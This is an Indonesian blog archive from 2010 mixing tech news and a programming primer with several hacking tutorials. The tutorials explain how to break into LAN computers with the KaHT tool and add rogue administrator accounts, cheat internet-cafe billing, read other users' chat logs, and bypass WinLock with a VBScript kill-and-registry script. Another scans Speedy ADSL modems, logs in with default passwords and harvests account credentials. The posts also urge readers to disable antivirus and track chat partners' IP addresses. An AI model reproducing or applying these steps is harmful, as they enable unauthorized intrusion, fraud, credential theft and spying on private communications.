Rabu, 29 September 2010

Rahasia : BlackBerry Playbook Tablet Keren Berprosesor Dual Core & Kamera 5MP Mengesankan

BlackBerry akhirnya mengumumkan tablet yang sebelumnya disebut BlackPad di rumornya. Tablet Blackberry Terbaru ini bernama Playbook, dengan layar 7 “(1024×600) , prosesor dual-core, dukungan WebKit, Java, Open GL, Flash 10.1 dan konektor micro-USB yang tidak ada pada iPad. Tablet ini juga mendukung video H.264, MPEG4, and WMV bahkan bisa menampilkan video FULL HD 1080p tapi diturunkan sesuai resolusi layar.


Spesifikasi hardware Blackberry Playbook juga cukup mengesankan di mana prosesornya 1Ghz dual core, 1 GB RAM, output micro-HDMI, bahkan ada kamera depan (3MP) dan belakang (5MP) yang juga mampu merekam video HD dan gambar diam.

Demo tablet Playbook ini terlihat sangat keren dan tampaknya membuat tablet berbasis Android menjadi kurang oke lagi karena fitur user-interface yang kelihatannya jauh lebih cocok untuk tablet, alih-alih menggunakan tablet seperti “ponsel besar”.

RIM mengedepankan fakta bahwa Playbook mendukung ” multitasking” secara nyata (tidak seperti Apple yang lebih terbatas ) dan dapat menjalankan Flash 10.1, yang berarti “sebuah pengalaman web penuh”.

RIM juga mengatakan bahwa tablet adalah lebih secure dan memposisikan Playbook sebagai tablet “profesional” pada saat ini.



Tablet ini adalah pengumuman besar bagi RIM, dan yang akan mengguncang pasar tablet. Sayang harga belum ditentukan dan Anda dapat tebak, ini akan menjadi faktor utama yang mempengaruhi penjualan. Kemungkinan harga Blackberry Playbook adalah sekitar 500 USD – 1000 USD.

Diduga tablet PlayBook ini akan mahal daripada iPad karena telah diposisikan sebagai tablet “pro”. Di sisi perangkat lunak, RIM telah mengambil langkah serius: perusahaan ini mengumumkan platform advertising dan kelengkapan SDK pengembang dan tool pendukung. (sumber)

Spesifikasi Blackberry Playbook:

* 7″ LCD display, 1024 x 600 screen resolution
* 5.1″ x 7.6″ x 0.4″ (130mm x 194mm x 10mm)
* 0.9 lbs (400g)
* Built-in microUSB connector
* Multi-touch capacitive screen
* Wi-Fi® 802.11 a/b/g/n

Kita harus melihat apakah semua upaya ini akan menghasilkan hasil pada tahun depan atau lebih.

Rahasia : Pengantar algorithma pemrograman terstruktur


Sesuai dengan permintaan dari teman-teman yang lagi sibuk nyari artikel tentang pemrograman terstruktur sebagai tugas pertama dari dosen yang IMOET nan humoris itu kali ini gw mau posting tentang tugas tersebut tapi sebelum dicetak tolong di edit dulu ya biar kliatan kreatip dikit nyonteknya(xixixixixixi..). Buat para pengunjung yang lainnya mohoon maap yah. Kali ini postingan gw agak melenceng dikit dari isi utama blog ini, mohon di maklumi. Ok gk perlu banyak basa basi lagi langsung aja. Check this out..!!

Beberapa istilah yang perlu diketahui dalam dunia pemrograman antara lain adalah sebagai berikut.
**Program**
Program adalah kumpulan instruksi/perintah yang disusun sebagai satu kesatuan prosedur yang berupa urutan langkah untuk menyelesaikan masalah yang diimplementasikan dengan menggunakan bahasa pemrograman sehingga dapat dieksekusi oleh komputer Bahasa pemrograman merupakan prosedur atau tata cara penulisan program.

**Pemrograman**
Pemrograman adalah proses untuk mengimplementasikan urutan langkah untuk menyelesaikan suatu masalah dengan menggunakan suatu bahasa pemrograman. Algorithma berasal dari kata algoris dan ritmis, yang pertama kali diungkapkan oleh Abu Ja’far Mohammed Ibn Musa al Khowarismi (825 M) dalam buku Al-Jabr Wa-al Muqabla. Dalam bidang pemrograman algorithma didefinisikan sebagai suatu metode khusus yang tepat dan terdiri dari serangkaian langkah yang terstruktur dan dituliskan secara sistematis yang akan dikerjakan untuk menyelesaikan suatu masalah dengan bantuan komputer.

**Bahasa Pemrograman**
Bahasa pemrograman berfungsi sebagai media untuk menyusun dan memahami suatu program komputer serta sebagai alat komunikasi antaraprogrammer dengan komputer. Bahasa pemrograman digolongkan menjadi beberapa tingkatan yaitu :

Bahasa tingkat rendah (Low Level Language)
Bahasa tingkat rendah merupakan bahasa pemrograman yang berorientasi pada mesin. Disebut tingkat rendah karena bahasa ini lebih dekat ke bahasa mesin daripada bahasa manusia. Yang tergolong dalam bahasa tingkat rendah adalah bahasa assembly.
Kelemahan bahasa tingkat rendah antara lain :
- sulit dipelajari karena programmer harus mengetahui seluk beluk perangkat keras yang digunakan
- bahasa assembly untuk satu jenis mikroprosesor satu dengan yang lain sangat jauh berbeda karena belum ada standardisasi. Contoh : bahasa assembly untuk mikroprosesor Intel 8088 dengan bahasa assembly untuk mikroprosesor Z-80 sangat jauh berbeda
- fungsi-fungsi yang tersedia sangat terbatas, misalnya tidak ada fasilitas untuk pemrograman grafik, fungsi-fungsi numerik & string, dll.
Selain memiliki kelemahan seperti tersebut di atas, bahasa assembly memiliki beberapa kelebihan yang tidak dimiliki oleh bahasa lain yaitu :
- kecepatan eksekusi dari program yang ditulis dengan bahasa assembly sangat tinggi, paling cepat dibanding dengan program-program yang dibuat menggunakan bahasa yang lain
- executable file yang dihasilkan oleh bahasa assembly ukurannya paling kecil. Buktinya : hampir semua program virus yang banyak beredar adalah dibuat dengan menggunakan bahasa assembly karena ukurannya paling kecil, sehingga kehadiran virus tersebut menjadi lebih sulit terdeteksi.


Bahasa tingkat tinggi (High Level Language)
Bahasa tingkat tinggi lebih dekat ke bahasa manusia dari pada bahasa mesin. Bahasa tingkat tinggi merupakan bahasa pemrograman yang memiliki aturan-aturan gramatikal dalam penulisan ekspresi atau pernyataan dengan standar yang mudah dipahami oleh manusia. Yang tergolong bahasa tingkat tinggi antara lain : BASIC, Fortran, COBOL, Pascal, Prolog, C, dll. Ada sebagian para pakar yang menyebut bahasa C sebagai bahasa tingkat menengah (middle level language), karena dianggap bahasa C adalah bahasa tingkat tinggi yang mempunyai kelebihan hampir menyamai bahasa assembly karena kelengkapan fungsinya dalam mengakses perangkat keras. Kelebihan bahasa tingkat tinggi antara lain :
- mudah dipelajari
- mempunyai fasilitas trace & debug untuk mendeteksi adanya kesalahan (error)
- mempunyai fungsi/library yang lengkap sehingga dapat mempermudah dan mempercepat pembuatan program.

Untuk lebih detilnya download aja fil pdf nya di sini
Semoga bisa Berguna.

Senin, 27 September 2010

Rahasia : 0elacak alamat IP


1. Melacak alamat IP suatu situs

2. Melacak Real Adress server suatu situs

3. Cara Mengetahui IP address lawan chatting kita

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

*Ingin menggunakan YM untuk beberapa user id di komputer yang sama? Anda bisa menggunakan software dan juga bisa dengan trik di bawah ini:

1. Start > Run…> regedit

2. Buka HKEY_CURRENT_USER > Software > yahoo > pager > test

3. Pada sebelah kanan, klik kanan > New > DWORD value

4. Beri nama Plural tekan enter 2 kali dan berikan nilai 1

5. Pastikan YM anda telah dimatikan, jalankan YM dan login secara biasa.

6. Kalau masih tidak bisa coba lagi step ke-5, kalau masih tidak bisa RESTART Tutorial Hacker Part 2 :

Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak para Newbie tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak.

1.Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan.

2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya :

1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties

2. Di properties pilihlah “find target…”

3. Muncul Window lalu pilih search diatas

4. Pada Search pilihlah “All Files and folders”

5. Lalu cari file “cmd.exe” di windows

6. Jika di temukan maka jalankan file cmd.exe.

7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut.

3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini

1. Masuk ke Notepad / Wordpad / Ms Word

2.Laluketik dibawah ini REGEDIT4 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""System] “DisableRegistryTools”=dword:00000001 [HKEY_CURRENT_USER\""SOFTWARE\""Microsoft\""Windows\""CurrentVersion\""Policies\""Explorer] “NoRun”=dword:00000000

3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan.

4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

1.Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows 95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\”"KaH) maka ketikkan “CD\”"KaHT” dan seterusnya. Jika sudah, ini saatnya? Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : “KaHT Ip1 ip2″ ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1″ lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di “c:\”"windows\”"system” milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\”"Program Files\”"MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\”"program Files\”"MiRC program MiRCnya maka cukup masuk aja di C:\”"Program Files\”"MiRC\”"Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab.. 5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators Guest /add Membuat akses adminstrator sendiri :

1. Ketik : net user /add

2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1. Cara mengetahui password administrator Windows – Download Proactive Windows Security Explorer

http://dl.winsite.com/files/439/ar2/win95/netutil/maniac.zip

http://evalsoftware.atelierweb.com/awrc62.zip

source:

http://har3165.blogsome.com/2007/05/23/cara-masuk-di-komputer-lain-lewat-dos-windows-xp-2000/

http://frengkysilaban.blogs.ie/2007/05/23/tips-01/

———–
Cara Mengetahui IP Address Lawan Chatting di Yahoo Messenger

Saya sempat banyak menerima pertanyaan mengenai cara untuk melihat IP dari lawan chat kita di YM. Sungguh sebenarnya saya bukanlah orang yang ahli dalam dunia chat di YM. tapi karena rasa penasaran saya, mbah google pun menemani saya untuk mencari jawabannya…

Setelah mencoba dan berlatih, ternyata kita bisa mengetahui IP address dari lawan chat kita dengan sebuah trik. cara itu adalah menggunakan fitur netstat di kompie windows anda. Netstat adalah fitur windows yang dapat membaca/melihat proses koneksi antar jaringan yang terjadi di komputer tersebut.

Tapi YM bukanlah sebuah chat yang menggunkan koneksi P2P yang notabene singkatnya adalah koneksi yang terjadi secara direct antar 2 komputer. YM menggunakan server sebagai medianya. Jadi ketika kita ketikkan netstat, akan terlihat IP dari server YM, bukan IP dari chatter yang kita ajak bicara.

Namun setelah mengetahui triknya, itu semua bisa diakali. caranya dengan mengirim file kepada lawan chatting kita.

Langkahnya sebagai berikut :

1. Login ke YM

2. Ajak chat siapa saja yang ingin anda ketahui ip addressnya

3. Buka cmd anda… ketik netstat kemudian enter

4. Akan ada banyak proses yang terlihat

5. Kirim file apa saja kepada lawan chat

6. Saat proses terjadi, pada jendela cmd, ketik netstat sekali lagi kemudian enter

7. Maka akan terlihat sebuah IP contohnya seperti ini : 10.245.101.204:5101 SYN_SENT

8. Nah.. itu dia ip address lawan chat anda.. ipnya adalah 10.245.101.204

9. Jika belum jelas, anda bisa menggunakan command netstat -n, maka akan keluar ip address dan port dalam numerik

Rahasia : Winlock


“buat iseng di Warnet”..
WinLock adalah sebuah program keamanan yang menyeluruh untuk pribadi atau komputer yang dapat diakses publik menjalankan semua versi Windows dari 95 hingga Vista. Ini adalah sebuah program yang memastikan bahwa hanya orang-orang yang berwenang dapat mengakses informasi yang sensitif pada komputer Anda.

Alat keamanan ini memungkinkan Anda untuk membatasi user dari mengakses sumber daya sistem yang penting seperti Control Panel, Desktop, dan sistem registry, menonaktifkan Windows hotkeys (seperti Ctrl-Alt-Del, Alt-Tab, Ctrl-Esc, dll), menyembunyikan tombol Start dan Taskbar.

Dengan WinLock Anda dapat mengontrol berapa lama orang lain dapat menggunakan komputer Anda. Ini berjalan dari system tray dan membutuhkan password untuk mendapatkan akses ke pengaturan yang tersedia.

Ini beban secara otomatis dengan Windows dan memungkinkan Anda untuk menambahkan opsional pesan startup, memberikan pemberitahuan audio, dan menetapkan batas waktu. Setelah bahwa batas tersebut tercapai, Windows ringkasnya ditutup. Anda dapat mengaktifkan dan menonaktifkan timer dari nampan.

Hal ini juga memungkinkan Anda menolak akses ke file yang dipilih, aplikasi, dan jendela Explorer (Recycle Bin, My Computer, dll), usb dan hard drive, filter konten internet dan melarang akses ke situs-situs Web yang patut dipertanyakan. Bila diaktifkan, tidak ada jalan lain tanpa password yang tepat.

Apakah Anda khawatir tentang rekan kerja yang terjadi di jaringan dan mendapatkan akses tanpa izin ke file pribadi Anda, atau anak-anak Anda mengacaukan file pekerjaan Anda, WinLock adalah sebuah perangkat lunak-satunya solusi untuk kebutuhan keamanan anda.

“Tapi walaupun demikian pasti punya kelemahan dan bisa diakalin tuk menjebol nya…
caranya :
Dari sound device pun bisa buka notepad. Dan langganan saya buat buka notepad/wordpad sih pake Lagu Gratisan dari windows itu loh, yang di sample music. hahaha..

Ya tinggal save as – pilih desktop – terus save dengan ekstensi .txt / .doc deh..

OK langsung aj yah, udah dibuka notepad/wordpad ?

Usahakan cek dulu ada deepfreeze atau kagak.

Kalo ada deepfreeze kan bisa ngilangin jejak deh dengan restart komputer.

Dan kalo gak ada deepfreeze musti ikutin cara kedua ntar.

Copy script ini

strComputer = “.”
Set objWMIService = GetObject(“winmgmts:” _
& “{impersonationLevel=impersonate}!\\” & strComputer & “\root\cimv2″)
Set colProcessList = objWMIService.ExecQuery _
(“Select * from Win32_Process Where Name = ‘winlock.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next

Const HKEY_CLASSES_ROOT = &H80000000

strComputer = “.”

Set objRegistry=GetObject(“winmgmts:\\” & _
strComputer & “\root\default:StdRegProv”)

strKeyPath = “CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID”
strValueName = “ID”

objRegistry.DeleteValue HKEY_CLASSES_ROOT, strKeyPath, strValueName

Dan save pake ekstensi .vbs (VBScript) dan klik 2x aja buat menjalankannya.

Sebenernya itu 2 script yang dijadikan 1 karena kesamaan ekstensi.

Keterangan :

Script 1 : Buat kill winlock.exe, karena biasanya task manager di disable kan ?

Script 2 : Buat delete key “ID” Winlock di regedit yang berada di CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

OK. Sekarang step 2. (AKTIFKAN TASK MANAGER)

Kenapa pake aktifkan TASKMGR? Karena disini kita bakal aktifin cmd (Command Prompt).

Kalo taskmanager / startnya gak didisable, bisa langsung aja buka commandprompt di accesories.

Dan coba aja windows+R, kalo bisa, ya langsung aj copy script aktifkan command promptnya dibawah.

/// Program Ramping Mengamankan Task Manager
// Nama Program: tsk_mgr.js
function prakata(pesan)
{
natan.popup(pesan,0,”Menjaga Task Manager”);
}
function catat(harga)
{
natan.RegWrite(“HKCU\\Software\\Microsoft\\Windows\\CurrentVersion”+
“\\Policies\\System\\DisableTaskMgr”,harga,”REG_DWORD”);
}
var vbYesNoCancel = 3, vbYes = 6, vbNo = 7, harga, pesan, tanya, natan;
natan = WScript.CreateObject(“WScript.Shell”);
pesan = “Menu Pilihan :\n\n”+
“Klik [Yes] untuk Nonaktifkan Task Manager.\n”+
“Klik [No] untuk Aktifkan Task Manager.\n”+
“Klik [Cancel] untuk Keluar.\n\n”+
“[+] http:www.suicidalizm.co.cc [+]\n\n”+
“NonAktifkan Task Manager sekarang?”;
tanya = natan.popup(pesan,0,”Menjaga Task Manager”,vbYesNoCancel);
if (tanya == vbYes)
{
harga=1;
pesan=”Task Manager DiNonAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else if (tanya == vbNo)
{
harga=0;
pesan=”Task Manager DiAktifkan! visit http://www.suicidalizm.co.cc”;
catat(harga);
prakata(pesan);
}
else
{
pesan=”visit http://www.suicidalizm.co.cc”;
prakata(pesan);
}

Save dengan ekstensi .js dan jalankan, lalu pilih NO buat mengaktifkan task manager.

Lalu buka task manager (ctrl+alt+del) – Pilih tab users – Klik menu File – Pilih Run – Lalu copy paste script ini di situ

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Ini fungsinya buat mengaktifkan command prompt.

Lalu dengan cara yang sama, ketik cmd untuk membuka command prompt.

Setelah masuk command prompt, Silahkan cari dimana folder winlock berada.

Misalkan berada di folder C:\program files\winlockpro

Ketik C: lalu enter Ketik cd program files lalu enter

Ketik cd winlockpro lalu enter

Dan ketik winlock.exe lalu enter

TADA… sekarang anda winlock baru pun sudah berjalan, dan silahkan shutdown/kill winlock.exe yang baru biar gak mengganggu.

Sekarang anda bebas mau ngapain aj. Mau Download/Colok USB/dll pokoknya bisa deh. Kan udah jadi admin =p

Cara reset Password Winlock
* buka dulu taskmanager dikomputermu.trus Kill Process yang namanya winlock.exe (di End Proses).

* klo Udah … buka regedit (start > run > ketik regedit)

cari :

HKEY_CLASSES_ROOT\CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID

ubah string ID menjadi ID1.setelah itu log off komputermu dan masuk kembali.

Dan Lihat APA YANG TERJADI SETELAH ITU … ?? JREENGG !!

klik icon winlock yang ada disudut kanan bawah komputermu.danwinlock itu akan meminta password baru. kesimpulannya passwordnya sudah direset, tinggal masukkan password baru …. huahahahah … >:)

* seperti biasa jika ingin menghilangkan jejak hapus kembali string yang tela dibuat di

HKEY_CLASSES_ROOT\CLSID\{D1A17367-4546-PRT8-6A19-11OO4FFI823O}\ProgID
ID dan ganti kembali ID1 menjadi ID ( jangan lupa sebelumnya harus di shutdown winlockpro, tidak perlu ctrl + alt +del lagi ..:0)

* jika ternyata taskmanager nya sudah didisable oleh administrator, maka hal itu bisa diatasi dengan software yaitu UnlockThemAll.software tersebut dapat membuat taskmanager,command prompt(CMD), dll dapat di enable kembali.

Rahasia : Hacking Modem ADSL dan Account Speedy

Semua ini berawal dari iseng-iseng aja,eh gk taunya berhasil :).Oke langsung aja
Langkah Pertama
Buka aplikasi mIRC? pilih server Dalnet? dan koneksikan. Kemudian join di beberapa channel itu terserah anda, dalam hal ini gw mencari target di channel #balikpapan dan #samarinda. Sesudah anda join klik Dalnet Status, kemudian ketikkan perintah ?/who #nama channel? tanpa tanda petik. Maka akan timbul beberapa teks. Biasanya IP dari Telkom Speedy angka awalnya adalah 125.xxx.xxx.xxx, IP inilah yang akan menjadi target scanning. Lihat gambar Berikut ini.

Langkah Kedua
Maka kita akan melihat tampilan seperti dibawah ini:


Buka aplikasi Advanced Port Scanner v1.0 Beta 1, kemudian cari sebuah IP contoh 125.160.33.41 ini merupakan sebuah IP TelkomSpeedy. Tetapi bukan IP itu yang akan kita scanning melainkan mengambil range IP dari 125.160.33.1-125.160.33.255, jadi angka yang diambil hanya 125.160.33. bukan 125.160.33.41 dan range yang dipake dari 1-255. Lihat hasil dari scanning tersebut.

Langkah Ketiga

Tes IP tersebut dengan menggunakan web browser, disini gw memakai Mozilla Firefox kemudian masukan IP tersebut. apabila timbul pop up login berarti modem ADSL tersebut bisa di remote dari luar. Selanjutnya berbekal kemampuan untuk menembus password dari modem sebaiknya anda mencari tutorial mengenai beberapa password default sebuah modem dengan merk-merk yang berbeda..

Gambar diatas merupakan login dari modem PROLINK type H9200.

Ini merupakan tampilan dari modem Prolink H920. Kemudian Pada kolom WAN Interfaces klik ppp-0 seperti yang terlihat pada gambar. Kemudian klik edit untuk melihat konfigurasi dari modem sekaligus untuk mencari account telkom speedy.

maka akan terlihat tampilan seperti ini :

Untuk melihat password, cukup dengan klik kanan pada pop up diatas view page source. Kemudian cari kata passwd. Lihat hasil pada gambar berikut:

Dari hasil diatas dapat dicoba di situs TelkomSpeedy untuk menguji account yang telah gw dapat. Accountnya adalah 161101201848@telkom.net dan passnya tetap saya hidden kan demi menjaga privacy yang punya account.




WARNING :)
Semua ini merupakan pembelajaran mengenai dunia hacking, tidak ada Pertanggung jawaban atas kerusakan yang terjadi akibat penyalahgunaan dari artikel ini jadi hati2 dan jangan disalah gunakan Broooo…!!!!!

Rahasia : te Cara Hacker Menembus sistem keamanan website


Seorang hacker yang ingin melakukan serangan ke sebuah situs, mereka mempunyai tahap-tahap dalam melakukan hacking, modus operandi mereka selalu hampir sama. sebagian besar adalah :
Mengumpulkan Informasi

ini adalah tahap awal untuk melakukan hacking, Hacker biasanya mengumpulkan informasi-informasi terhadap target terlebih dahulu, misalnya mencari informasi terhadap Operating System terhadap server target tersebut, apakah target memakai server berbasikan linux, atau window. Juga melakukan Port scanning pada website tersebut, untuk mengetahui port tersebut di gunakan untuk apa saja, dan port apa saja yang terbuka. lalu memeriksa aplikasi dari server tersebut.

misalnya apakah menggunakan PHP, atau CGI, atau ASP sebagai bahasa program untuk aplikasi situsnya.
Melakukan Survey

Jika sudah mendapatkan informasi-informasi tersebut di atas, hacker akan melakukan survey untuk mencari kelemahan terhadap informasi yang dia dapat tadi, apakah memiliki kelemahan atau tidak.
Memeriksa Input Validation

Bila sudah di tahap ini, hacker akan melakukan uji coba atas input validation yang di gunakan website tersebut. dan mencari tahu, Input apa yang di butuhkan oleh server tersebut agar bisa melakukan perubahan.
Memulai Serangan

Setelah mengumpulkan informasi terhadap situs target, maka hacker akan memulai serangannya.
Metode serangan favorit yang sering di lakukan oleh hacker

SQL Injection
Penyerang akan menjalankan perintah SQL melalui website tersebut, ini bisa di lakukan dengan dua cara, yakni melalui pengeditan Form , atau pun melalui pengeditan link url.

Cross site scripting ( CSS attack )
Dengan serangan ini, Input yang di masukan pengguna lainnya dalam website tersebut akan di transfer ke website nya si penyerang.

Directory traversal Attack
Juga di kenal dengan ../ ( dot dot slash ) attack. Dengan serangan ini, directory yang tadinya tidak bisa di lihat ( forbiden ) akan bisa di akses. Dengan cara melakukan penambahan ../ di link target.

Parameter manipulation
Melakukan manipulasi terhadap data yang di transfer antara browser dengan aplikasi website tersebut. hal ini bisa di lakukan dengan beberapa cara :

Cookie manipulation
Cookie yang menyimpan data login dalam suatu sesi, dengan adanya cookie, seorang user tidak perlu lagi melakukan login ke website tersebut, selama dia belum melakukan logout. karena cookie ini di simpan di dalam komputer klient, penyerang dengan mudah memanipulasi data cookie tersebut.

HTTP Header Manipulation
HTTP headers yang mengontrol informasi dari jaringan klien ke server situs, di karenakan HTTP header ini berasal dari komputer client ( pelanggan ) . Penyerang dengan mudah mengubah dan memanipulasi data tersebut.

HTLM Form Field manipulation
Sebuah form login, form pendaftaran, Form transfer, yang biasanya ada di suatu situs bisa di modifikasi dengan mudah, dan melancarkan serangan dengan memakai form yang sudah di ubah tersebut.

URL manipulation
Sebuah situs yang menampilkan parameter perintah di bagian link situs tersebut di browser, akan dengan mudah di baca oleh penyerang tersebut untuk melakukan perubahan.

